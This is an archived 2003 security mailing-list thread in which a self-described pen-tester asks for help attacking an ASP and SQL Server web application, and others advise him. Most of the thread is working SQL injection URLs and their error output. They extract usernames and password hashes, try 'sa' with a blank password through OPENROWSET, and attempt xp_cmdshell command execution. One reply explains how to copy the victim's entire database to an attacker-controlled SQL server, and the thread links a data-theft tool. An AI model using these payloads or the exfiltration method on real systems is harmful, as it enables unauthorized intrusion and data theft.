Re: SQL Injection ASP + SQL Server (problem) ?!
Cesar,
I think you misunderstood the use of OPENROWSET explained in the paper
below:
http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf
The idea is to install MS-SQL server on YOUR OWN SYSTEM, and then use the
openrowset command to pull data from the vulnerable system to your system.
Of course, as the paper explains, you will have to be able to make SQL
requests from the vulnerable system to yours over some TCP port
(preferably 1433, as this saves you some extra hassle). As long as you
can inject the OPENROWSET command, and you can make TCP connections out
from their database server, you can recreate their entire database on your
local system. The process is quite long and doesn't allow for mistakes,
so I'd try it out in a lab environment first to get familiar with it.
Good luck.
Stephen
On Wed, 30 Jul 2003 sekure@hadrion.com.br wrote:
> Hi Cesar,
>
> First Thkz for help and attention.
>
> > Take a look a this paper:
> >
>
> Your paper is very intersting.. with advanced techniques.. :)
>
> But how i will use OPENROWSET if as i wrote in my first mail i can't get the
> password for admin. :(
>
> ps.: See my last mail...
>
> Then i tryed use sa without password....
>
> http://www.server.com/portal/index.asp?local=ler&id_noticia=(select%20*%20from%20OPENROWSET('SQLoledb','uid=sa;pwd=;Network=DBMSSOCN;address=127.0.0.1;','%20select%20*%20from%20usuarios'))%20--
>
> But it have a passowrd...
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'sa'.
>
>
> Ideas ?
>
> A other doubt if the conecction timeout or the server didn't respond...
> probrability the SQL Server is in other Server. Do u know some tips to
> detect where is other SQL Server (IP) ??
>
> ps.: If i could read local files i could try find user/pass in .asp files..
> ;)
>
> > also this tool, you only have to copy, paste and click
> > and you get all the data you want:
> > http://www.appsecinc.com/resources/freetools/DataThief.zip
>
> I treyd it.. I used this string in url
> http://www.server.com/portal/index.asp?local=ler&id_noticia=1'; <***> with
> GET method. And i received always this message:
>
> Data Thief V1.0
> [DBMSSOCN] General network error. Check your network connection.
>
> Can u help me ?? :)
>
> ps.: My first post is below.. :)
>
> Thkz and Regards
>
> [ ]'s
>
>
>
> >
> >
> >
> > Cesar.
> >
> > --- sekure@hadrion.com.br wrote:
> > > Hi,
> > >
> > > I'm doing a pen-test in a WebServer running Win2K +
> > > IIS + ASP + SQL
> > > Server (filtred for internet connections).
> > >
> > > The IIS appear to be very well patched. I'm trying
> > > SQL Injection. :)
> > >
> > > I found a bug in ASP Script... see:
> > >
> > >
> >
> http://www.server.com/portal/index.asp?local=read&id_notice=(select%20min(user)%20from%20users)%20--
> > >
> > > I received the name of the min(user) in users
> > > tables, see:
> > >
> > > Technical Information (for support personnel)
> > >
> > > Error Type:
> > > Microsoft OLE DB Provider for ODBC Drivers
> > > (0x80040E07)
> > > [Microsoft][ODBC SQL Server Driver][SQL
> > > Server]Syntax error converting
> > > the nvarchar value 'admin' to a column of data type
> > > int.
> > >
> > > The username is "admin". Now i want to know the
> > > password of "admin" i
> > > tryed:
> > >
> > >
> >
> http://www.server.com/portal/index.asp?local=read&id_notice=(select%20pass%20from%20users%20where%20user='admin')%20--
> > >
> > > But i received it:
> > >
> > > Error Type:
> > > Microsoft OLE DB Provider for ODBC Drivers
> > > (0x80004005)
> > > [Microsoft][ODBC SQL Server Driver][SQL
> > > Server]Subquery returned more
> > > than 1 value. This is not permitted when the
> > > subquery follows =, !=,
> > > <, <= , >, >= or when the subquery is used as an
> > > expression.
> > >
> > > 1 - Someone know how to do it return more than 1
> > > value ?? can give-me
> > > a example ?
> > >
> > > I tryed it too:
> > >
> > >
> >
> http://www.server.com/portal/index.asp?local=read&id_notice=(select%20min(pass)%20from%20users%20where%20user='admin')%20--
> > >
> > > And i receive it:
> > >
> > > Error Type:
> > > Microsoft OLE DB Provider for ODBC Drivers
> > > (0x80040E07)
> > > [Microsoft][ODBC SQL Server Driver][SQL
> > > Server]Syntax error converting
> > > the varchar value
> > >
> >
> '{0049-0096-0145-0200-0246-0288-0365-0392-0289-0320-0353-0384-0417-0448-0481
> -0512-0545-0576-0609-0640}'
> > > to a column of data type int.
> > >
> > > 2 - But it isn't a "password", it appear be a
> > > registry key. Someone
> > > know what is it ?? And how to do it work and see the
> > > password ? :)
> > >
> > > 3 - I tryed to create a SQL Transaction like this:
> > >
> > >
> >
> http://www.server.com/portal/index.asp?local=read&id_noticia=";%20begin%20declare%20@ret%20varchar(8000)%20set%20@ret=':'%20select%20@ret=@ret+'%20�+use
> r+'/'+senha%20from%20users%20where%20user>@ret%20select%20@ret%20as%20ret%20
> into%20alluser%20end%20--
> > >
> > > I receive it:
> > >
> > > Error Type:
> > > Microsoft OLE DB Provider for ODBC Drivers
> > > (0x80040E14)
> > > [Microsoft][ODBC SQL Server Driver][SQL Server]The
> > > identifier that
> > > starts with '; begin declare @ret varchar(8000) set
> > > @ret=':' select
> > > @ret=@ret ' � user '/' senha from users where
> > > user>@ret select @ret
> > > as' is too long. Maximum length is 128.
> > >
> > > Someone know why i received this error ?? I
> > > overfflowed the sized
> > > allowed in paramter by variable in ASP ? or in SQL
> > > Server ? How to do
> > > it work ?? :)
> > >
> > > 4 - My last doubt. I tryed execute commands with
> > > xp_cmdshell.. see:
> > >
> > >
> >
> http://www.server.com/portal/index.asp?local=read&id_notice=0';EXEC+master..xp_cmdshell(cmd.exe+/c)--
> > >
> > > and receive:
> > >
> > > Error Type:
> > > Microsoft OLE DB Provider for ODBC Drivers
> > > (0x80040E14)
> > > [Microsoft][ODBC SQL Server Driver][SQL
> > > Server]Unclosed quotation mark
> > > before the character string ';EXEC
> > > master..xp_cmdshell(cmd.exe /c)--'.
> > >
> > >
> > > OR:
> > >
> > >
> >
> http://www.server.com/portal/index.asp?local=read&id_notice=1';EXEC%20master.dbo.xp_cmdshell'cmd.exe%20dir%20c:'--
> > >
> > > Error Type:
> > > Microsoft OLE DB Provider for ODBC Drivers
> > > (0x80040E14)
> > > [Microsoft][ODBC SQL Server Driver][SQL Server]Line
> > > 1: Incorrect
> > > syntax near ';EXEC master.dbo.xp_cmdshell'.
> > >
> > > OR using quotes:
> > >
> > >
> >
> http://www.server.com/portal/index.asp?local=read&id_notice=1`;EXEC%20master.dbo.xp_cmdshell'cmd.exe%20dir%20c:'--
> > >
> > > Error Type:
> > > Microsoft OLE DB Provider for ODBC Drivers
> > > (0x80040E14)
> > > [Microsoft][ODBC SQL Server Driver][SQL Server]Line
> > > 1: Incorrect
> > > syntax near '`'.
> > >
> > >
> > > And tryed too (use the bug to exec xp_cmdshell
> > > stored procedure with a
> > > non privilegied user):
> > >
> > >
> >
> http://www.server.com/portal/index.asp?local=read&id_notice=";(SELECT%20*%20FROM%0OPENROWSET'SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SE
> T%20FMTONLY%20OFF%20execute%20master..xp_cmdshell%20"dir%20c:\"'))--
> > >
> > > I receive ... again the error:
> > >
> > > Error Type:
> > > Microsoft OLE DB Provider for ODBC Drivers
> > > (0x80040E14)
> > > [Microsoft][ODBC SQL Server Driver][SQL Server]The
> > > identifier that
> > > starts with ';(SELECT * FROM
> > >
> > OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET
> > > FMTONLY OFF execute master..xp_cmdshell' is too
> > > long. Maximum length
> > > is 128.
> > >
> > >
> > > If i try:
> > >
> > >
> >
> http://www.server.com/portal/index.asp?local=read&id_notice=(SELECT%20*%20FROM%0OPENROWSET'SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET%20FMTONLY%20OFF%20execute%20master..xp_cmdshell%20"dir%20c:\"'))--
> > >
> > > I receive:
> > >
> > > Error Type:
> > > Microsoft OLE DB Provider for ODBC Drivers
> > > (0x80040E14)
> > > [Microsoft][ODBC SQL Server Driver][SQL Server]Could
> > > not create an
> > > instance of OLE DB provider 'SQLOLEDB'.
> > >
> > > What i'm doing wrong ?? How to do it work ??
> > >
> > > Thkz a lot.
> > >
> > > Best Regards.
> > >
> > > [ ]'s
> > >
> > >
> > --------------------------------------------------------------------------
> -
> > >
> > --------------------------------------------------------------------------
> --
> > >
> >
> >
> > __________________________________
> > Do you Yahoo!?
> > Yahoo! SiteBuilder - Free, easy-to-use web site design software
> > http://sitebuilder.yahoo.com
>
>
> ---------------------------------------------------------------------------
> ----------------------------------------------------------------------------
>
>
---------------------------------------------------------------------------
----------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7
: Sat Apr 12 2008 - 10:53:37 EDT